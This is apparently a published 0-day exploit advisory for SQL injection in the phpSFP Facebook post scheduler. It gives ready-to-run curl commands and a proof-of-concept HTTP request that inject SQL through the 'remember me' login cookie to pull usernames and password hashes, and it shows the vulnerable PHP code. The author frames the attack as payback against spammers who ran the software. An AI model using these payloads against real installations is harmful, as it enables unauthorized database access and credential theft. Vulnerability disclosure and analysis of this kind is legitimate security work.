120 lines
No EOL
4.3 KiB
Text
120 lines
No EOL
4.3 KiB
Text
######################################################################
|
||
# _ ___ _ _ ____ ____ _ _____
|
||
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
|
||
# | | | | | | \| | | _| | / _ \ | |
|
||
# | |__| |_| | |\ | |_| | |___ / ___ \| |
|
||
# |_____\___/|_| \_|\____|\____/_/ \_\_|
|
||
#
|
||
# phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection (0-day)
|
||
# Website : http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393
|
||
# Exploit Author : @u0x (Pichaya Morimoto)
|
||
# Release dates : April 2, 2015
|
||
#
|
||
# Special Thanks to 2600 Thailand group:
|
||
# xelenonz, pe3z, anidear, windows98se, icheernoom, penguinarmy
|
||
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
|
||
#
|
||
########################################################################
|
||
|
||
[+] Description
|
||
============================================================
|
||
phpSFP – is a Platform where you can easily manage your scheduling for
|
||
all your (Facebook) pages & groups in one place.
|
||
It helps to send messages, ads, events, news and so on. phpSFP is
|
||
pretty popular more than its sale record thanks to nulled group
|
||
(underground WebApp license crackers).
|
||
|
||
[+] Background <3
|
||
============================================================
|
||
I managed to track down a group of Vietnam-based Facebook spammer
|
||
which posted ads on many FB groups I'm joined.
|
||
And ended up with a website that is modified version (all phpSFP
|
||
credits are removed) of phpSFP 1.4.1.
|
||
so I did some matching and found the original application is phpSFP.
|
||
|
||
Guess what happens when spammer mess up with offsec guy ;)
|
||
|
||
[+] Exploit
|
||
============================================================
|
||
There are many possible ways to do SQLi, I will go with error-based
|
||
which enabled by default on phpSFP xD
|
||
|
||
$ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or
|
||
extractvalue(rand(),concat(0x2e,user())) or '1|||1"
|
||
|
||
in case you don't know, for further queries you have to change
|
||
'user()' to something else, e.g.
|
||
|
||
$ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or
|
||
extractvalue(rand(),concat(0x2e,(select
|
||
concat_ws(0x3a,username,password) from users limit 1))) or '1|||2"
|
||
|
||
don't forgot to do length()/substr() stuffs due to limitation of 32
|
||
characters in error message
|
||
|
||
|
||
[+] Proof-of-Concept
|
||
============================================================
|
||
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
|
||
|
||
GET /index.php/login HTTP/1.1
|
||
Host: 192.168.33.103
|
||
Proxy-Connection: keep-alive
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||
Accept-Encoding: gzip, deflate, sdch
|
||
Accept-Language: en-US,en;q=0.8
|
||
Cookie: login=1|||1' or extractvalue(rand(),concat(0x2e,(select
|
||
concat_ws(0x3a,username,password) from users limit 1))) or '1|||2
|
||
|
||
HTTP/1.1 500 Internal Server Error
|
||
Server: Apache/2.4.7 (Ubuntu)
|
||
Date: Thu, 02 Apr 2015 13:15:08 GMT
|
||
Content-Type: text/html; charset=UTF-8
|
||
Connection: keep-alive
|
||
Set-Cookie: ci_session=<deducted>; expires=Sat, 01-Apr-2017 13:15:08
|
||
GMT; Max-Age=63072000; path=/
|
||
Content-Length: 838
|
||
|
||
<html>
|
||
<head>
|
||
<title>Database Error</title>
|
||
<style type="text/css">
|
||
....
|
||
<h1>A Database Error Occurred</h1>
|
||
<p>Error Number: 1105</p><p>XPATH syntax error:
|
||
'admin:f0250d9b38c974122119abf826'</p><p>
|
||
....
|
||
|
||
|
||
[+] Vulnerability Analysis
|
||
============================================================
|
||
I have analyzed on 1.5.6 (lastest version) and 1.4.1 (a popular
|
||
edition released by nulled group)
|
||
The bug itself is quite interesting.. the author did well in login
|
||
function but failed
|
||
to parameterized/escape SQL query in 'remember me' function in
|
||
authentication phrase.
|
||
|
||
; phpSFP 1.5.6
|
||
File: application/models/auth.php
|
||
function cookie()
|
||
{
|
||
if(get_cookie('login')) <-- if 'login' cookie is setted
|
||
{
|
||
list($id_user, $password, $access) = explode("|||",
|
||
get_cookie('login')); <-- split by |||
|
||
// the magic happens here
|
||
$qusers = $this->db->query("SELECT id FROM users WHERE
|
||
id='".$id_user."' AND password='".$password."'");
|
||
|
||
; phpSFP 1.4.1, same thing but in different file
|
||
File: application/controllers/login.php
|
||
public function index()
|
||
{
|
||
if(get_cookie('login')) <-- if 'login' cookie is setted
|
||
{
|
||
list($id_user, $password, $access) = explode("|||",
|
||
get_cookie('login')); <-- split by |||
|
||
// the magic happens here
|
||
$qusers = $this->db->query("SELECT id FROM users WHERE
|
||
id='".$id_user."' AND password='".$password."'"); |